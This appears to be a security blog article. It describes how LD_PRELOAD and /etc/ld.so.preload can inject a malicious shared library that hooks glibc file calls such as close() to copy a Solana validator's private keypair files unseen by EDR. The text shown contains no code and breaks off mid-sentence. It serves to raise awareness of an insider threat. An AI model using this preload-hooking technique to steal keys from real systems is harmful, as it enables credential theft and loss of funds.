Ld_preload, the Invisible Key Theft

Summary

Imagine you are running a Solana validator. You have your EDR agent running, and you have everything set up and think you are safe. But you realize your wallet is drained and you don’t know why. You start to investigate and see that the validator only accessed your private keys and nothing else. You check the directory’s permissions, logs from EDR, and everything seems to be in order. The Threat LD_PRELOAD is an environment variable that allows you to load a shared library before the program starts. This is a powerful feature that can be used to hook system calls and intercept file operations. There are other similar variables like LD_LIBRARY_PATH. This is not ENV variables alone. There are things like /etc/ld.so.preload that can be used to load a shared library before the program starts. Linux built this feature to allow developers to load shared libraries before the program starts so that they can debug and test their code. Our implementation of this exploitation code is in our Github Repo. Why Solana? This is not just a Solana problem. This is a problem for any application that loads credentials from a file. The insider threat is real and a problem for any organization. This is another way to steal private keys. There is too much at stake not to be careful. The Vulnerability Now, most of us write userspace applications, and use libraries like glibc to handle the file operations, so we never really think about this issue. glibc does the heavy lifting for us, but what if we hook into the file operations and intercept them before glibc does its thing? This is what LD_PRELOAD allows us to do. It is a way to hook into a library call. In our case, we did this by hooking into the file operations and intercepting them before glibc did its thing. When the validator read its keypair files from disk, we intercepted the close() call and made a copy before the file descriptor closed. We wrote a malicious shared library that hooks into the file operations. We also call the rea...